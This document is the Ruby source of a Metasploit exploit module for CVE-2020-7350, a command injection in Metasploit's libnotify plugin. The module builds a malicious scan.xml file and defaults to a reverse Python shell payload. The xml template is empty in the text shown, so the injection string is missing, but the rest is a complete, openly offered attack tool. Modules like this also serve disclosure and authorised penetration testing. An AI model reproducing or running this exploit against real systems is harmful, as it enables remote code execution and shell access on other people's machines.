## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution', 'Description' => %q( This module exploits a shell command injection vulnerability in the libnotify plugin. This vulnerability affects Metasploit versions 5.0.79 and earlier. ), 'DisclosureDate' => 'Mar 04 2020', 'License' => GPL_LICENSE, 'Author' => [ 'pasta ' # Discovery and PoC ], 'References' => [ [ 'CVE', '2020-7350' ], [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'DisableNops' => true }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }, 'Targets' => [[ 'Automatic', {}]], 'Privileged' => false, 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']), ] ) end def exploit xml = %(
) print_status "Writing xml file: #{datastore['FILENAME']}" file_create xml end end